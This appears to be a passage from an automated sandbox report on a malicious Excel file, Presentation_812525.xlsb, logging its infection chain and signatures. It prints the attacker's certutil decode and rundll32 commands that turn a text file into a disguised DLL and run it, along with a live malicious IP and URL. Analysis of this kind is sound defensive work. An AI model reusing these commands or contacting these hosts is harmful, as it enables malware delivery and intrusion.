Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{60490B27-0950-42C5-96BE-3819E3A7C960} - OProcSessId.dat Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\ProgramData\ioq\ioq.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\ProgramData\ioq\ioq.dll,DllRegisterServer Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Presentation_812525.xlsb Initial sample: OLE zip file path = xl/media/image1.png
Source: Presentation_812525.xlsb Initial sample: OLE zip file path = docProps/thumbnail.wmf
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001C26 push ecx; ret 6_2_10001C39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009032D0 push edx; ret 6_2_009033D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00903270 push edx; ret 6_2_0090327B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009007B8 push eax; ret 6_2_009007C2

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\SysWOW64\certutil.exe File created: C:\Users\Public\94101.png Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\certutil.exe File created: C:\Users\Public\94101.png Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\certutil.exe File created: C:\Users\Public\94101.png Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\certutil.exe File created: C:\Users\Public\94101.png Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses certutil -decode
Source: unknown Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: unknown Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001A64 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_10001A64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001E5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_10001E5C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001A64 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_10001A64
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 74.6.143.26 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 172.104.129.156 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 87.248.100.215 187 Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001C6B cpuid 6_2_10001C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000168B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_1000168B
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 342076 Sample: Presentation_812525.xlsb Startdate: 20/01/2021 Architecture: WINDOWS Score: 96 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for dropped file 2->45 47 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->47 49 4 other signatures 2->49 7 EXCEL.EXE 28 38 2->7         started        process3 dnsIp4 41 192.168.2.1 unknown unknown 7->41 27 C:\Users\user\...\~$Presentation_812525.xlsb, data 7->27 dropped 29 C:\Users\Public\94101.txt, ASCII 7->29 dropped 51 Uses certutil -decode 7->51 53 Document exploit detected (process start blacklist hit) 7->53 12 certutil.exe 2 7->12         started        16 rundll32.exe 16 7->16         started        19 certutil.exe 2 7->19         started        file5 signatures6 process7 dnsIp8 31 C:\Users\Public\94101.png2, ASCII 12->31 dropped 55 Drops PE files to the user root directory 12->55 21 conhost.exe 12->21         started        35 172.104.129.156, 49707, 80 LINODE-APLinodeLLCUS United States 16->35 37 new-fp-shed.wg1.b.yahoo.com 87.248.100.215, 443, 49709 YAHOO-IRDGB United Kingdom 16->37 39 2 other IPs or domains 16->39 57 System process connects to network (likely due to code injection or exploit) 16->57 23 rundll32.exe 16->23         started        33 C:\Users\Public\94101.png, PE32 19->33 dropped 25 conhost.exe 19->25         started        file9 signatures10 process11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
74.6.143.26
 unknown United States
26101 YAHOO-3US false
172.104.129.156
 unknown United States
63949 LINODE-APLinodeLLCUS true
87.248.100.215
 unknown United Kingdom
34010 YAHOO-IRDGB false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
new-fp-shed.wg1.b.yahoo.com 87.248.100.215 true
yahoo.com 74.6.143.26 true
www.yahoo.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://172.104.129.156/campo/o/o true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown